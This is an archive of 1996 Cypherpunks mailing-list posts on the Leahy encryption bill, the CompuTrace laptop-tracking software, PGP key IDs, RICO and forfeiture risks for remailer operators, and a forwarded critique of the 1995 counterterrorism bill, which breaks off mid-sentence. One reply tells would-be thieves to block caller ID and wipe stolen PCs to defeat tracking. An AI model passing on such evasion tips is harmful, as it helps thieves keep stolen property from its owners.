Message-ID: <ad6c970d040210046472@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It is said that, as with sausage, one should never watch law being made.
Well, the Leahy bill is rancid sausage.

At 4:07 PM 3/13/96, jamesd@echeque.com wrote:

>Looking for "good guys" in Washington is like Ronald Reagan looking
>for "moderates" in Iran.  On crypto, and on taxes, our interests
>and their their interests are completely opposed.  We should not
>care about, or take any interest in, the slight difference between
>the "moderate" and extremist members of the Senate and the House
>of Representatives.
>
>
>The best bill we can ever hope to get out of Washington is no
>bill at all.

I think this is true. The Leahy bill is so filled with caveats,
qualifications, and references to "legitimate needs of law enforcement"
that it appears to be _WORSE_ than what we now have, where there are
currently few if any laws about domestic encryption.

This is not a "Congress shall make no law" sort of bill. This does not in
clear and unambiguous language say there shall be no restrictions on
cryptography.

Rather, it is more of a "We think crypto is pretty important, especially
for our friends in business, provided it is not used by bad people, is not
used to repress marginalized people of color, is not used to evade the
taxes we covet so much in Washington, and provided that law enforcement's
legitimate needs are satisfied" sort of bill. And it is likely to get even
worse as the Administration starts whacking at it.

(I'm exaggerating a bit, but the more I see of the Leahy bill and of the
analyses done of it, the more concerned I get.)

The last time the EFF pushed for repressive legislation--the Digital
Telephony Act (aka The Wiretap Act)--it nearly finished them off (*). This
time, the support of the EFF may truly finish them off. And the same may
happen to the other lobbying groups if they support the Leahy bill.

(* In the aftermath of Digital Telephony, it was explained by various EFF
spokeswonks that EFF had little choice but to support DT, and that it had
emerged stronger and more influential than ever. Right. Sure. Whatever.
Shortly thereafter, various staff shakeups and departures occurred, the EFF
pulled up stakes and moved to San Francisco, and is now but a shadow of its
former self. Sorry if my views offend EFF founders, but I call 'em as I see
'em.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Mar 1996 14:02:32 +0800
To: cypherpunks@toad.com
Subject: Re: LACC: PC Phones Home?
Message-ID: <ad6c9d2805021004d38c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(This came to me via the Cypherpunks list, and was addressed to
"lacc@suburbia.net". I have no idea who that is, or how it got to the CP
list...probably another local reflector of the list, of which we seem to be
getting more and more every day. Very confusing. I am removing these from
the distribution list...if they get it, they get it.)

At 2:28 PM 3/13/96, D. C. Hilliard wrote:
>Listers,
>
>I came across a blurb in the local paper today and was interested if
>someone here could provide some substance to the story:
>
>"Software to the rescue:
>If somoeone steals your PC, you may be able to get it back because of
>software that acts as a kind of tracking device. Home Office Computing
>magazine reports that the software CompuTrace TRS will automatically dial
>the office of its creator, Absolute Software, if a thief hooks up a stolen
>PC's modem to a phone line. The software reveals the location of the PC and
>Absolute Software will call the police" - Providence Journal-Bulletin -
>March 12, 1996.
>
>Any Comments?

Thanks for the pointer. I found more info via Alta Vista, including a more
detailed press release (http://199.125.99.5/vpr/vpr/000246.htm).

It looks "cypherpunkly correct" to me. No mandatory aspects and no
privacy-limiting aspects. It calls the CompuTrace number weekly, and this
could in principle help to track a mobile (laptop) user. But the
arrangement is voluntary, and of course the owner knows about it and hence
is not being tricked.

(Slightly more worrisome might be corporate-owned laptops, with the program
used to track where employees are making use of the laptop. However, two
things mitigate against this. First, CompuTrace only makes a trace of the
call if the laptop is reported stolen (though this arrangement could be
modified by the corporate owner). Second, the weekly call is a poor
granularity for tracking (though this, too, could be modified). Lastly, the
owner of the laptop can do with his property what he wishes, as I see it.)

I would think that a knowledgeable thief could disable such software, even
if it is fairly cleverly hidden. But a typical thief would not. But then a
typical thief merely stockpiles the things he steals and is unlikely in the
extreme to actually try to use the PC he has stolen.

The likeliest scenario is that the stolen machine is sold to someone at a
flea market, or through classified ads in the paper, or as part of a bulk
sale to a company seeking cheap computers. It is this user who is likely to
get nabbed.

(And then they'll have to return the computer as stolen property and tell
what they know about who sold it to them. Sounds fair to me.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 14 Mar 1996 17:26:35 -0500
To: matthew@itconsult.co.uk (Matthew Richardson)
Subject: Re: PGP reveals the key ID of the recipient of encrypted msg
In-Reply-To: <3146910b.90015235@itconsult.co.uk>
Message-ID: <199603140140.RAA06876@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: matthew@itconsult.co.uk (Matthew Richardson)]
[cc: cypherpunks@toad.com]
[Subject: Re: PGP reveals the key ID of the recipient of encrypted msg ]
[In-reply-to: Your message of Wed, 13 Mar 96 09:12:10 GMT.]
             <3146910b.90015235@itconsult.co.uk> 

matthew@itconsult.co.uk (Matthew Richardson) came full circle with:
>On Wed, 13 Mar 1996 00:28:48 -0500, "Robert A. Rosenberg"
><hal9001@panix.com> wrote:

>>There is also the problem of knowing WHICH key to use (ie: Even when you
>>know the message is intended for you, you must do a test run with each of
>>your keys until one works).

>I believe that provided all your keys are in your secret keyring, PGP
>will automatically pick the correct one for you.

But PGP can only do this because the keyID is there in the encrypted
text, and the point of this discussion was to strip off the keyIDs so
that you couldn't tell who the message was being sent to any more...

Arrgh.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMUdvyIHskC9sh/+lAQH+WwP/aDYO2Pp9b9+x7UxYYITIG46WxaM8uaxg
9hQg/1ZaoRRC5Ha/8kF4W2gUu3ecCJ6Kh1E/mCOVm3TUVWV+47tzolLsT8tM3530
13pLr6wmbwir+CFs4cURxjMpEKx/CixbyzvzZWD939woiKIjYiivoBEhwoBZE9bz
2cdUHnYjvro=
=1Lhv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Mar 1996 12:27:08 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill, legalize crypto
Message-ID: <ad6ca85f06021004764e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:18 PM 3/13/96, James A. Donald wrote:

>Any crypto bill that we could realistically get out of Washington will
>substantially reduce liberty.  The best that we can hope for is for
>Washington to forget about crypto until it is too late to stop.

This is our best hope at this point: that Washington moves on to other
things as the campaign heats up and forgets about crypto.

One reason Washington pushed for the Wiretap Act (aka Digital Telephony)
was because digital switches have made conventional methods of wiretapping
and pen registers harder and harder to do. (I'm not a phone phreaker
expert, as some of you no doubt are, so I don't know the details of how
wiretaps were done prior to the advent of digital switches...I picture
wires connected to the back of PBX systems, and I presume the ESS systems
and their ilk changed this dramatically.)

However--and here's the kicker!--they blew it. If you look at Louis Freeh's
testimony before Congress a couple of years ago (which I did in detail, as
I scanned and OCRed it for Whit Diffie, who may make it available soon) he
was clearly worried about the phone system becoming so complex and "so
digital" that FBI surveillance capabilities would fall behind the
technology curve. So, he and his supporters (including the EFF) pushed for
the Wiretap Act.

(No money has yet been allocated, last I heard, so the $500 million
supposedly to reimburse the telcos for providing wiretap capability, hasn't
happened.)

The main way they blew it is that the Wiretap Act ostensibly does not cover
end-to-end encryption, especially as computers are used in place of
telephones. And as Internet voice systems become widespread, especially
with transparent, easy-to-use encryption (Nautilus, PGPhone, etc., in a
couple of version iterations), even some goombah in Little Sicily will be
able to communicate securely and essentially unbreakably.

That they are realizing this, belatedly (although hints of this recognition
can be found in Freeh's comments to Congress), may be why a couple of moves
are occurring:

- a fast-track review by the FCC to determine if "Internet voice" services
are to be regulated, controlled, enacted, redacted, and impacted. (The
traditional phonecos are the ones squealing most loudly, but others are
expressing concern over the "anarchy" of unlicensed Internet applications.)

- the Leahy Bill, which would as various analysts have noted make
disclosure of keys mandatory, would protect the legitimate needs of law
enforcement, blah blah blah.

Speculatively, I can see something coming on the horizon. Suppose the FCC,
under the Telecommuications Act, the Leahy Act (or whatever), and the
Digital Telephony Act, extended to the Internet the same general
restrictions on cryptography that currently apply to the airwaves? Suppose
encryption is allowed, but only with key escrow? While I can think of
various problems with enforcement--the very points many of us have raised
over the past several years--I can also see this as having wide support.
And it might pass constitutional muster (for the same reasons the FCC
jurisdiction over airwaves and the ban on encryption by ham operators, got
approval. Sure, I understand that Internet bandwidth is not the same as the
"public airwaves," but this subtlety may not be enough to stop the parallel
from being successfully drawn. Especially if the phone companies and other
threatened players are pushing hard for the FCC to step in and regulate.

Food for thought.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 15 Mar 1996 14:04:24 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: RICO and remailers (brief treatment, if long)
Message-ID: <Pine.SUN.3.91.960313191209.8242F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


0
Several people expressed interest in a small treatment of seizure law 
jurisprudence, and the Bennis case (seizure of an automobile used for 
soliciting prostitution was upheld even where one of the owners knew 
nothing about its use for a crime and which Mr. Bell has relied on 
fairly heavily in pointing out that the Supreme Court has its "head 
up its ass.")

I want to point out that I'm not being paid for this.  As a result 
anyone who takes this like legal advice, rather than what it is, i.e. 
an academic examination, does so at their own peril.

-A-

RICO

I cover RICO because it's a popular prosecution tool, because it is 
the predominate vehicle for seizure and forfeiture in federal cases 
(of which remailer and encryption issues are likely to arouse) and 
because it represents a codification of the approach most courts take 
when dealing with seizure cases.  In a very real way, RICO represents 
the outer extremes of seizure cases in the United States, and is 
probably, given the complexity of many state laws, the simplest way 
to "grab" something.  It also has civil provisions which make 
"private prosecutors" out of you and me.

Generally speaking, after its passage (1970) RICO was ignored.  
(Interested readers might look to Bradley, Racketeers, Congress and 
the Courts: An Analysis of RICO, 65 Iowa Law Review, 837 (1980). for 
a detailed review of its early development).  It was "rediscovered" 
some years later, and grew in popularity because of the civil 
provisions for divestiture, dissolution, reorganization, and 
restrictions on future activites as well as treble damages under 18 
U.S.C. 1964.

Generally speaking, in order to secure a conviction with RICO, one 
must prove the existance of an "enterprise" and a connected "pattern 
of racketeering activity."  RICO prosecutions are generally triggered 
by predicate acts, listed specifically in the statute.  The statute 
lists these in the definitions section.  (Section 1961)  I reproduce 
some below to give the reader a feel for what is anticipated:

As used in this chapter--
(1) "racketeering activity" means (A) any act or threat involving 
murder, kidnaping, gambling, arson, robbery, bribery, extortion, 
dealing in obscene matter, or dealing in a controlled substance or 
listed chemical (as defined in section 102 of the Controlled 
Substance Act), which is chargeable under State law and punishable by 
imprisonment for more than one year; (B) any act which is indictable 
under any of the following provisions of title 18, United States 
Code: [bribery, sports bribery, counterfeiting, theft from interstate 
shipment, embezzlement from pension or welfare funds, extortionate 
credit transactions, mail fraud, transmission of gambling 
information, wire fraud, financial institution fraud, obscene 
matters, obstruction of justice, tampering with witnesses, informants 
or victims, money laundering, monetary transactions with respect to 
property derived from unlawful activity, sexual exploitation of 
children, white slavery, (some deleted)]  (18 U.S.C. 1961)

The activities specifically prohibited by RICO are also statuatorily 
defined.  Specifically:

(a) It shall be unlawful for any person who has received any income 
derived, directly or indirectly, from a pattern of racketeering 
activity... in which such person has participated as a principal 
within the meaning of section 2, title 18, United States Code, to use 
or invest, directly or indirectly, any part of such income, or the 
proceeds of such income, in acquisition of any interest in, or the 
estlablishment or operation of, any enterprise which is engaged in, 
or the activities of which affect, interstate or foreign commerce....
(b) It shall be unlawful for any person through a pattern of 
racketeering activity or through collection of an unlawful debt to 
acquire or maintain, directly or indirectly, any interest in or 
control of any enterprise which is engaged in, or the activities of 
which affect, interstate or foreign commerce.
(c) It shall be unlawful for any person employed by or associated 
with any enterprise engaged in, or the activities of which affect, 
interstate or foreign commerce, to conduct or participate, directly 
or indirectly, in the conduct of such enterprise's affairs through a 
pattern of racketeering activity or collection of an unlawful debt.  
(Section 1962)
(d) [or to conspire to do any of the above]

The seizure provisions are contained in 18 U.S.C., Section 1963:

(a) Whoever violates any provision of section 1962 of this chapter 
shall be [fined and imprisoned or both] and shall forfeit to the 
United States, irrespective of any provision of State Law--
(1) any interest the person has acquired or maintained in violation 
of section 1962;
(2) any --
(A) interest in;
(B) security of;
(C) claim against; or
(D) property or contractual right of any kind affording a source of 
influence over;
[the enterprise violating section 1962]; and
(3) any property constituting, or derived from, any proceeds which 
the person obtained, directly or indirectly, from racketeering 
activity or unlawful debt collection in violation of section 1962.
[...]
(b) Property subject to criminal forfeiture under this sections 
includes--
(1) real property, including things growing to, affixed to, and found 
in land; and
(2) tangible and intangible personal property, including rights, 
privileges, interests, claims and securities.

The lead case generally used to outline the overall principals of 
RICO is United States v. Turkette, 452 U.S. 576 (1981).

Most of the defining litigation surrounding RICO involved refining 
the definitions of "enterprise" and "pattern" of racketeering.  
Turkette indicates in part that:

Section 1962(c) makes it unlawful "for any person employed by or 
associated with any enterprise engaged in, or the activities of which 
affect, interstate or foreign commerce, to conduct or participate, 
directly or indirectly, in the conduct of such enterprise's affairs 
through a pattern of racketeering activity or collection of unlawful 
debt."  The term "enterprise" is defined as including "any 
individual, partnership, corporation, association, or other legal 
entity, and any union or group of individuals associated in fact 
although not a legal entity."  (Turkette)

Of primary importance, and the key issue in Turkette, is the fact 
that "There is no restriction upon the associations embraced by the 
definition: an enterprise includes any union or group of individuals 
associated in fact." Id.

Both legitimate and illegitimate enterprises qualify.  United States 
v. Hartley, 678 F.2d 961 (11th Cir. 1982) applied RICO to an 
otherwise legitimate corporate defendant.  On the subject of passive 
involvement of a defendant in criminal activity the court in Haroco 
Inc. v. American Nat'l Bank & Trust Co. 747 F.2d 284 (7th Cir. 1984) 
offers:

...the defendants are surely correct in saying that the corporation 
enterprise should not be liable when the corporation is itself the 
victim or target or merely the passive instrument for the wrongdoing 
of others... The liable person may be a corporation using the 
proceeds of a pattern of racketeering activity in its operations.  
This approach... makes the corporation enterprise liable under RICO 
when the corporation is actually the direct or indirect beneficiary 
of the pattern of racketeering activity, but not when it is merely 
the victim, prize, or passive instrument of racketeering.  This 
result is in accord with the primary purpose of RICO, which, after 
all, is to reach those who ultimately profit from racketeering, not 
those who are victimized by it. (This preference for enterprise 
liability has been followed by other courts. See e.g., Schreiber 
Distributing Co. v. Serv-Well Furniture Co., 806 F.2d 1393 (9th Cir. 
1986); Commonwealth of Pa. v. Derry Construction Co., 617 F.Supp 940 
(W.D.PA 1985).  See generally, First, Business Crime, 1990)

And Ravens v. Ernst and Young, 113 S.Ct. 1163, refines the definition 
of "conduct or participate" thusly:

Once we understand the word "conduct" to require some degree of 
direction, and the word "participate" to require some part in that 
direction, the meaning of section 1962(c) comes into focus.  In order 
to "participate, directly or indirectly in the conduct of such 
enterprise's affairs," one must have some part in directing those 
affairs.  Of course, the word "participate" makes clear that RICO 
liability is not limited to those with primary responsibility for the 
enterprise's affairs, just as the phrase "directly or indirectly" 
makes clear that RICO liability is not limited to those with a formal 
position in the enterprise, [note 4] but some part in directing the 
enterprise's affairs is required.  The "operation or management" test 
expresses this requirement in a formulation that is easy to apply... 
In sum, we hold that "to conduct or participate, directly or 
indirectly, in the conduct of such enterprise's affairs," one must 
participate in the operation or management of the enterprise itself.

Let us assume for a moment then that the worst conspiracy one can 
imagine, involving all of the horsemen of the infopocalypse, uses a 
remailer to conduct its activities.  Absent a showing that the 
conspiracy is involved, participating, or directing the operation of 
the remailer, or that the conspiracy used proceeds to support the 
remailer, it is pretty clear that the remailer, and the operator are 
a "passive instrument" of the conspiracy.

One might also look to the Justice Department Guidelines for the use 
of RICO as a prosecutoral tool:

"...it is not the policy of the criminal Division to approve 
"imaginative" prosecutions under RICO which are far afield from the 
Congressional purpose of the RICO statute.... Further, it should be 
noted that only in exceptional circumstances will approval be granted 
when RICO is sought merely to serve some evidentiary purpose, rather 
than to attack the activity which Congress most directly addressed- 
the infiltration of organized crime into the nation's economy."  (9-
110.200, RICO guidelines preface).

One might also look at the second circuit in Huber:

"We further note that where the forfeiture [under RICO] threatens 
disproportionately to reach untainted property of the defendant... 
section 1963 permits the [court] a certain amount of discretion in 
avoiding draconian (and perhaps unconstitutional) applications of the 
forfeiture provision."

In sum, provided no statute exists expressly felonizing the operation 
of e-mail forwarding or encryption, I wouldn't much worry about RICO.  
It is possible, I suppose, to construct a creative (very creative) 
argument that mere operation of a remailer is wire fraud, and thus 
triggers RICO and allows seizure, but I find this fairly unlikely. I might 
add that future legislation prohibiting "furtherance of a felony via 
encryption" or some such is almost certain to have a scienter 
requirement making innocent forwarders of such information  who did not 
know they were furthering a felony immune from the statute, and thus RICO.

-B-

The Michigan Case, and why it has absolutely nothing to do with 
remailers.

Mr. Bell has made a great to-do about the Bennis case (seizure of 
automobile absent showing that co-owner knew of criminal use of 
same).  His connection of the case to remailers is surrounded by 
a good deal of imagination, myth, and outright fabrication.  I 
thought I would take a closer look and see what was to be found.  That 
done, let me then dispel some of the myths.


Myth #1:  This holding means that any property can be seized for any 
crime and the owner placed at the mercy of the state at a whim.

Totally false.  The Michigan law is specifically written to allow 
property seizure in the specific instance of prostitution or 
gambling.  Many states have forfeiture laws, but they are an extreme 
resort, and typically bear only on very narrow activities.  Michigan, 
further, is at the draconian side of the spectrum.  Michigan also has 
some of the toughest state drug laws in the country (Automatic life 
sentence without parole for mere possession without intent to 
distribute, of more than 650 grams of cocaine)  Consider the Michigan 
law used in Bennis, reproduced below.

Section 600.3801 of Michigan's Compiled Laws. states in pertinent 
part: "Any building, vehicle, boat, aircraft, or place used for the 
purpose of lewdness, assignation or prostitution or gambling, or used 
by, or kept for the use of prostitutes or other disorderly persons... 
is declared a nuisance... and all... nuisances shall be enjoined 
and abated as provided in this act and as provided in the court 
rules.  Any person or his or her servant, agent, or employee who 
owns, leases, conducts, or maintains any building, vehicle, or place 
used for any of the purposes or acts set forth in this section is 
guilty of a nuisance."
Section 600.3825 states in pertinent part:
   "(1) Order of abatement. If the existence of the nuisance is 
established in an action as provided in this chapter, an order of 
abatement shall be entered as a part of the judgment in the case, 
which order shall direct the removal from the building or place of 
all furniture, fixtures and contents therein and shall direct the 
sale thereof in the manner provided for the sale of chattels under 
execution . . . .
"(2) Vehicles, sale. Any vehicle, boat, or aircraft found by the 
court to be a nuisance within the meaning of this chapter, is subject 
to the same order and judgment as any furniture, fixtures and 
contents as herein provided."  Mich. Comp. Laws Ann. @ 600.3825 
(1987).


Myth #2: This means that if your property is seized, you can never 
make an innocent owner defense to the seizure.

Again, false.  Many statutes allow innocent owner defenses and some 
courts will assume the availability of such a defense in absence of 
express intent by the legislature to the contrary.  In this case 
there was such an expression.  Namely:

"Proof of knowledge of the existence of the nuisance on the part of 
the defendants or any of them, is not required." Mich. Comp. Laws 
Ann. @ 600.3815(2) (1987).


Myth #3: If your car is stolen, and it is used in the sales of drugs, 
its gone baby.

False.  Most states recognize that use of property without the 
owner's consent insulates the property from seizure.  Michigan is no 
exception.  Note the Supreme Court's Comment in the Bennis Case:

The Michigan Supreme Court specifically noted that, in its view, an 
owner's interest may not be abated when "a vehicle is used without 
the owner's consent." Id., at 742, n. 36, 527 N.W.2d at 495, n. 36.


Myth #4:  This is a new and outlandish holding by the Supreme Court.  
Nothing like this has ever been seen before.  It represents a turn to 
fascism.  The current Supreme Court has its head up its ass.

False.  The history of allowing seizure of property not taken without 
the owners consent, even if the specific use of the property was 
indeed without the owners knowledge, goes back more than 150 years and 
can be traced to Britain's own practice (maintained to this day).  
Take the Supreme Court's comment again in the Bennis Case:

Our earliest opinion to this effect is Justice Story's opinion for 
the Court in The Palmyra, 25 U.S. 1, 12 Wheat. 1, 6 L. Ed. 531 
(1827). The Palmyra, which had been commissioned as a privateer by 
the King of Spain and had attacked a United States vessel, was 
captured  [*10]   by a United States war ship and brought into 
Charleston, South Carolina, for adjudication. Id., at 8. On the 
Government's appeal from the Circuit Court's acquittal of the vessel, 
it was contended by the owner that the vessel could not be forfeited 
until he was convicted for the privateering. The Court rejected this 
contention, explaining:
"The thing is here primarily considered as the offender, or rather 
the offense is attached primarily to the thing." Id., at 14.


Myth #5:  This means that if someone drives my car to the city, and 
then blows up a building and flees via subway, my car is history.

False.  In order to allow seizure, the property seized must typically 
be an "instrumentality" of the crime.  Granted this is a bit of a 
obscure distinction at times, even to supreme court justices:

The limits on what property can be forfeited as a result of what 
wrongdoing--for example, what it means to "use" property in crime for 
purposes of forfeiture law--are not clear to me. See United States v. 
James Daniel Good Real Property, 510 U.S., ___ (1993) (slip op., at 
2-5) (THOMAS, J., concurring in part and dissenting in part). 
(Bennis)

But it's fairly clear that this is a significant defense to seizure, 
and one which was never raised by the defense in Bennis:

It thus seems appropriate, where a [challenge] by an innocent owner 
is concerned, to apply [the instrumentality] limits rather strictly, 
adhering to historical standards for determining whether specific 
property is an "instrumentality" of crime. Cf. J. W. Goldsmith, 
Jr.-Grant Co., supra, at 512 (describing more extreme hypothetical 
applications of a forfeiture law and reserving decision on the 
permissibility of such applications).The facts here, however, do not 
seem to me to be obviously distinguishable from those involved in Van 
Oster; and in any event, Mrs. Bennis has not asserted that the car was 
not an instrumentality of her husband's crime. (Bennis)

After getting the government's brief by fax this afternoon, it became 
fairly clear why the non-instrumentality defense was not made:

After John Bennis was seen stopping and allowing Ms. Polarchio to 
enter his car, the Police followed him to a residential area, midway 
in the block, where his car stopped and the lights were turned off. 
(TR-63-65) After the police stopped behind the Bennis' auto, two 
heads were seen: a female on the right, a male on the left. Seconds 
later, the female head went down, disappearing toward the drivers 
side. (TR 65-66)
When the officer observed John Bennis and Kathy Polarchio engaged in 
fellatio in the Bennis' car, John Bennis had his pants pulled down. 
(TR-67)  (Bennis: Brief for the Government)

It's pretty hard to argue that the automobile was not an 
instrumentality of the crime when it was used to pick up, transport 
and conceal, indeed make possible the very illicit sexual practices of the 
defendant which are at issue.  (i.e. public solicitation of prostitution 
and lewd conduct on a public street within the car itself, conduct 
probably not possible in this form without the automobile).


Myth #6: The court just doesn't care about property rights.

False.  The court spends a great deal of time thinking about the 
parties rights, and even suggests a different ruling had the car not 
be co-owned by the perpetrator of the crime.

First, it bears emphasis that the car in question belonged to John 
Bennis as much as it did to Tina Bennis. At all times he had her 
consent to use the car, just as she had his. (Bennis)

It also considered what Mrs. Bennis would actually gain from a ruling 
in her favor from a practical standpoint:

Th[e] court declined to order a division of sale proceeds, as the 
trial judge took pains to explain, for two practical reasons: the 
Bennises have "another automobile," App. 25; and the age and value of 
the forfeited car (an 11-year-old Pontiac purchased by John and Tina 
Bennis for $ 600) left "practically nothing" to divide after 
subtraction of costs. See ante, at 3 (majority opinion) (citing App. 
25).(Bennis)

While it is tempting to damn the decision after listening to the 
sound bytes, there is much more going on here than a mere seizure.

Remailer operators shouldn't be concerned (at least with regard to 
these cases) overmuch until a local state statute addressing 
remailers specifically is passed in a jurisdiction where the innocent 
owner defense is not permitted, or in any jurisdiction where such 
statute forbids resort to the innocent owner defense.  I will, 
however, note that this is only about 3 hours work, and I wouldn't go 
betting the farm on it.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 14 Mar 1996 13:49:16 +0800
To: cypherpunks@toad.com
Subject: Re:LACC: PC Phones Home?
Message-ID: <v02140b01ad6d4363168b@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


Dennis Hilliard writes:
>
>"Software to the rescue:
>If somoeone steals your PC, you may be able to get it back because of
>software that acts as a kind of tracking device. Home Office Computing
>magazine reports that the software CompuTrace TRS will automatically dial
>the office of its creator, Absolute Software, if a thief hooks up a stolen
>PC's modem to a phone line. The software reveals the location of the PC and
>Absolute Software will call the police" - Providence Journal-Bulletin -
>March 12, 1996.
>
>Any Comments?

A few questions:

1- How does the PC know where it is?
2- How does the PC know it has been stolen?

Since this is a software product I am assuming that the answer to #1
is the use of CallerID on the line when the software calls, which is
defeated by the use of line blocking by the thief.  The obvious answer
to #2 seems to me to have the system call the CompuTrace office at
odd intervals to see if it has been reported stolen yet...

Obvious solution for potential thieves: wipe the disks and reinstall
an OS once you steal a PC.  This should be done anyway to remove any
bits of data which might identify the original owner.

Conclusion:  Yet another useless piece of software riding the
computer security bandwagon.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Witanek <bwitanek@igc.apc.org>
Date: Fri, 15 Mar 1996 12:37:43 +0800
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Subject: Omnibus Repression
Message-ID: <APC&1'0'a9f982cb'8f8@igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


From: Bob Witanek <bwitanek@igc.apc.org>

Posted owner-187-l@CMSA.BERKELEY.EDU  Wed Mar 13 07:43:50 1996
Subject:      Immigration in Counter-Terrorism Bill
ANALYSIS OF IMMIGRATION AND FUND-RAISING 
PROVISIONS IN OMNIBUS
COUNTERTERRORISM ACT OF 1995 

by David Cole, 
Professor, Georgetown University Law Center



I. INTRODUCTION AND SUMMARY





	The "Omnibus Counterterrorism Act of 1995," drafted by the
Clinton Administration, was introduced on February 10, 1995 by Senators
Biden and Specter, among others, in the Senate, and by Congressman
Schumer in the House.  The bill is wide-ranging, dealing with
everything from the making of plastic explosives, to bomb threats and
trading in nuclear materials.  But it also prohibits a wide range of
First Amendment protected activities, resurrects "guilt by association"
as a guiding principle of criminal and immigration law, and creates an
unprecedented "alien terrorist removal procedure" that would deny
immigrants the most basic of due process protections -- the right to
confront the evidence the government seeks to use against one.  This
memorandum briefly addresses those provisions of the bill that raise
the gravest civil liberties concerns.

	In brief, the Administration's bill would reintroduce to
federal law the very principle of guilt by association that defined the
McCarthy era, and which has been repudiated since then.  It triggers
criminal penalties and even deportation not on individual culpability,
but simply on a showing that those with whom one associates have
engaged in illegal acts.  It allows the government to impose up to ten
years' imprisonment on citizens, and deportation on non-citizens, where
an individual has done nothing more than support the lawful activities
of an organization that the government has labelled "terrorist," even
if it is undisputed that that organization engages in a wide range of
lawful activities and that the individual supported only such lawful
activities.  This is guilt by association in its purest form.

	The bill goes beyond McCarthyism in authorizing trials based on
secret evidence for immigrants accused of supporting a "terrorist
organization."  Under this provision, the government not only could
deport immigrants for supporting solely lawful activities of
organizations that have also engaged in unlawful acts, but could do so
on the basis of evidence that the immigrant and his lawyers would never
see.  This provision authorizes secret proceedings, one-sided, ex parte
appeals, and expressly permits the INS to use information obtained
illegally.

	When the government has previously sought to rely on
undisclosed evidence against non-citizens living here, the courts have
barred it from doing so on due process grounds.  The courts have held
that secret evidence defeats the adversarial process, and deprives the
individual against whom it is used a meaningful opportunity to defend
himself.  When the INS last sought to use secret evidence to expel a
permanent resident alien, the D.C. Circuit likened the position of the
alien to that of "Joseph K. in The Trial," finding that "[i]t is
difficult to image how even someone innocent of all wrongdoing could
meet such a burden [of rebutting undisclosed evidence that he is a
terrorist]." Rafeedie v. INS, 880 F.2d 506, 516 (D.C. Cir. 1989).

	This bill's secret evidence procedure has the same fundamental
flaw -- it allows the government to rely on information that the alien
cannot see.  Due process cannot be squared with the affirmative use of
secret evidence.

	




II.	IMMIGRATION LAW CHANGES





	Title II of the Omnibus Counter-Terrorism Act would change
immigration law in two respects.  First, it amends the substantive
provisions authorizing deportation and exclusion of non-citizens for
"engaging in terrorist activities," broadly expanding the definition to
include support of solely lawful activities.  Second, it allows the
government to deport aliens accused under this broad substantive
provision on the basis of secret, undisclosed evidence.  This memo will
address each provision in turn.





	A.	Section 202: Changes to the Immigration and Nationality
Act to Facilitate Removal of Alien Terrorists





	This section changes current immigration law to broaden
substantially the government's power to deport aliens based on charges
that they have supported a terrorist organization.






1.  Current Law





	Under current law, aliens are excludable and deportable if they
either engage in a terrorist activity themselves, of if they provide
material support to an individual, organization, or government "in
conducting a terrorist act at any time." Terrorist activity under
current law is defined extremely broadly, to include any use of a
firearm or explosive with the intent to endanger person or property.
However, the current law does require the government to prove that the
individual it seeks to deport or exclude has actually engaged in such
activity, or has provided material support for the conducting of such
activity.






2.	Expansion of "Terrorism" Deportation Provisions to Include
Support of Lawful Activity





	The proposed bill would eliminate any requirement that the
alien actually have any connection to terrorist activity per se, and
would substitute guilt by association.  Under the new law, the
government need only prove that the alien has afforded "material
support to any individual, organization, or government which the actor
knows or reasonably should know has committed or plans to commit
terrorism activity."  Section 202 (a)(B)(iii). Under this provision, an
individual who pays taxes to a government that has engaged in the use
